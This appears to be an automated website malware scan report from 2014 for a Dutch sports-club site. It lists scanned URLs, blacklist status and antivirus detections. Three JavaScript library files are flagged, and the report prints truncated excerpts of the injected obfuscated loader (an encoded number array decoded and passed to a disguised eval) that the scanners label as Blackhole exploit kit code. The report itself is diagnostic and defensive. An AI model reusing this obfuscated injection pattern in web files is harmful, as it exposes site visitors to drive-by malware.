Malware Scanner report for prospero-knowledge.nl

Malicious/Suspicious/Total urls checked
3/0/17
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "prospero-knowledge.nl" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=prospero-knowledge.nl

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://prospero-knowledge.nl/

Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.

Scanned pages/files

Request / Server response / Status
http://prospero-knowledge.nl/
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 08:03:17 GMT
Accept-Ranges: bytes
ETag: "baafbe55cdddce1:2b8143"
Server: Microsoft-IIS/6.0
Content-Length: 366
Content-Location: http://prospero-knowledge.nl/index.html
Content-Type: text/html
Last-Modified: Sun, 10 Nov 2013 04:28:41 GMT
X-Powered-By: ASP.NET
clean
http://prospero-knowledge.nl/index.html
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 08:03:17 GMT
Accept-Ranges: bytes
ETag: "baafbe55cdddce1:2b8143"
Server: Microsoft-IIS/6.0
Content-Length: 366
Content-Type: text/html
Last-Modified: Sun, 10 Nov 2013 04:28:41 GMT
X-Powered-By: ASP.NET
clean
http://www.prospero-knowledge.nl/starklasse/index.php
200 OK
Content-Length: 15577
Content-Type: text/html
clean
http://www.prospero-knowledge.nl/starklasse/media/system/js/caption.js
200 OK
Content-Length: 1721
Content-Type: application/x-javascript
clean
http://www.prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.script.js
200 OK
Content-Length: 3207
Content-Type: application/x-javascript
clean
http://www.prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.rightcol.js
200 OK
Content-Length: 1600
Content-Type: application/x-javascript
clean
http://www.prospero-knowledge.nl/starklasse/js/prototype.js
200 OK
Content-Length: 133484
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



var Prototype = {
Version: '1.6.0.2',

Browser: {
IE: !!(window.attachEvent && !window.opera),
Opera: !!window.opera,
WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1,
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},

BrowserFeatures: {
XPath:
... 3348 bytes are skipped ...
","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3n","3m","3l","4c","4a","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3n","3m","3l","4c","4a","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-506!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

Antivirus reports:

AntiVir: JS/Agent.axqoua
Avast: JS:Includer-BAU [Trj]
Ad-Aware: JS:Exploit.BlackHole.KP
Ikarus: Trojan.Script
nProtect: JS:Exploit.BlackHole.KP
K7AntiVirus: Exploit ( 04c552e31 )
TrendMicro-HouseCall: JS_BLACOLE.SMAP
Emsisoft: JS:Exploit.BlackHole.KP (B)
Comodo: TrojWare.JS.Blacole.YA
K7GW: Exploit ( 04c552e31 )
TrendMicro: JS_BLACOLE.SMAP
Microsoft: Trojan:JS/BlacoleRef.CM
Kaspersky: Trojan-Downloader.JS.Agent.gvn
MicroWorld-eScan: JS:Exploit.BlackHole.KP
Fortinet: JS/Blacole.HT!exploit
Jiangmin: Trojan/Script.Gen
McAfee: JS/Exploit-Blacole.ht
NANO-Antivirus: Trojan.Script.Blackhole.bekghp
F-Secure: JS:Exploit.BlackHole.KP
VIPRE: Trojan.JS.BlacoleRef.cm (v)
AVG: HTML/Framer
GData: JS:Exploit.BlackHole.KP
AVware: Trojan.JS.BlacoleRef.cm (v)
BitDefender: JS:Exploit.BlackHole.KP

http://www.prospero-knowledge.nl/starklasse/js/scriptaculous.js?load=effects,builder
200 OK
Content-Length: 5843
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



var Scriptaculous = {
Version: '1.8.1',
require: function(libraryName) {
document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>');
},
REQUIRED_PROTOTYPE: '1.6.0',
load: function() {
function convertVersionString(versionString){
var r = versionString.split('.');
return parseInt(r[0])*100000 + parseInt(r[1])*1000 + parseInt(r[2]);
}

if((typeof Pro
... 3601 bytes are skipped ...
","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3n","3m","3l","4c","4a","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3n","3m","3l","4c","4a","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-506!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

Antivirus reports:

AntiVir: JS/Agent.axqoua
Avast: JS:Includer-BAU [Trj]
Ad-Aware: JS:Exploit.BlackHole.KP
Ikarus: Trojan.Script
nProtect: JS:Exploit.BlackHole.KP
K7AntiVirus: Exploit ( 04c552e31 )
TrendMicro-HouseCall: JS_BLACOLE.SMAP
Emsisoft: JS:Exploit.BlackHole.KP (B)
Comodo: TrojWare.JS.Blacole.YA
K7GW: Exploit ( 04c552e31 )
TrendMicro: JS_BLACOLE.SMAP
Microsoft: Trojan:JS/BlacoleRef.CM
Kaspersky: Trojan-Downloader.JS.Agent.gvn
MicroWorld-eScan: JS:Exploit.BlackHole.KP
Fortinet: JS/Blacole.HT!exploit
Jiangmin: Trojan/Script.Gen
McAfee: JS/Exploit-Blacole.gc
NANO-Antivirus: Trojan.Script.Blackhole.bekghp
F-Secure: JS:Exploit.BlackHole.KP
VIPRE: Trojan.JS.BlacoleRef.cm (v)
F-Prot: JS/IFrame.UJ!Eldorado
AVG: HTML/Framer
GData: JS:Exploit.BlackHole.KP
Commtouch: JS/IFrame.UJ!Eldorado
AVware: Trojan.JS.BlacoleRef.cm (v)
BitDefender: JS:Exploit.BlackHole.KP

http://www.prospero-knowledge.nl/starklasse/js/lightbox.js
200 OK
Content-Length: 22017
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)



LightboxOptions = Object.extend({
fileLoadingImage: 'images/loading.gif',
fileBottomNavCloseImage: 'images/closelabel.gif',

overlayOpacity: 0.8,
animate: true, resizeSpeed: 7,
borderSize: 10,
labelImage: "Image",
labelOf: "of"
}, window.LightboxOptions || {});


var Lightbox = Class.create();

Lightbox.prototype = {
imageArray: [],

... 3202 bytes are skipped ...
","16","16","16","16","16","16","16","16","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","2e","4h","2l","3m","1e","1d","3n","3m","3l","4c","4a","1d","1f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3n","3m","3l","4c","4a","1f","27","d","a","16","16","16","16","4l","d","a","4l","1f","1e","1f","27"];h=2;s="";if(zxc){for(i=0;i-506!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}

Antivirus reports:

AntiVir: JS/Agent.axqoua
Avast: JS:Includer-BAU [Trj]
Ad-Aware: JS:Exploit.BlackHole.KP
Ikarus: Trojan.Script
nProtect: JS:Exploit.BlackHole.KP
K7AntiVirus: Exploit ( 04c552e31 )
TrendMicro-HouseCall: JS_BLACOLE.SMAP
Emsisoft: JS:Exploit.BlackHole.KP (B)
Comodo: TrojWare.JS.Blacole.YA
K7GW: Exploit ( 04c552e31 )
McAfee-GW-Edition: JS/Exploit-Blacole.ht
TrendMicro: JS_BLACOLE.SMAP
Microsoft: Trojan:JS/BlacoleRef.CM
Kaspersky: HEUR:Trojan.Script.Iframer
MicroWorld-eScan: JS:Exploit.BlackHole.KP
Fortinet: JS/Blacole.HT!exploit
Jiangmin: Trojan/Script.Gen
McAfee: JS/Exploit-Blacole.ht
NANO-Antivirus: Trojan.Script.Blackhole.bekghp
F-Secure: JS:Exploit.BlackHole.KP
VIPRE: Trojan.JS.BlacoleRef.cm (v)
F-Prot: JS/IFrame.UJ!Eldorado
AVG: HTML/Framer
Norman: Blacole.WD
GData: JS:Exploit.BlackHole.KP
Commtouch: JS/IFrame.UJ!Eldorado
AVware: Trojan.JS.BlacoleRef.cm (v)
BitDefender: JS:Exploit.BlackHole.KP

http://prospero-knowledge.nl/starklasse/index.php
200 OK
Content-Length: 15497
Content-Type: text/html
clean
http://prospero-knowledge.nl/starklasse/media/system/js/caption.js
200 OK
Content-Length: 1721
Content-Type: application/x-javascript
clean
http://prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.script.js
200 OK
Content-Length: 3207
Content-Type: application/x-javascript
clean
http://prospero-knowledge.nl/starklasse/templates/ja_purity/js/ja.rightcol.js
200 OK
Content-Length: 1600
Content-Type: application/x-javascript
clean
http://prospero-knowledge.nl/starklasse/
200 OK
Content-Length: 15488
Content-Type: text/html
clean
http://prospero-knowledge.nl/starklasse/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3Byb3NwZXJvLWtub3dsZWRnZS5ubC9zdGFya2xhc3NlL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTgwOndlZHN0cmlqZGthbGVuZGVyLTIwMTM=
200 OK
Content-Length: 2727
Content-Type: text/html
clean
http://prospero-knowledge.nl/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean
http://prospero-knowledge.nl/starklasse/index.php?view=article&id=80:wedstrijdkalender-2013&tmpl=component&print=1&layout=default&page=
200 OK
Content-Length: 1874
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: prospero-knowledge.nl

Result:
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 08:03:17 GMT
Accept-Ranges: bytes
ETag: "baafbe55cdddce1:2b8143"
Server: Microsoft-IIS/6.0
Content-Length: 366
Content-Location: http://prospero-knowledge.nl/index.html
Content-Type: text/html
Last-Modified: Sun, 10 Nov 2013 04:28:41 GMT
X-Powered-By: ASP.NET

...366 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: prospero-knowledge.nl
Referer: http://www.google.com/search?q=prospero-knowledge.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.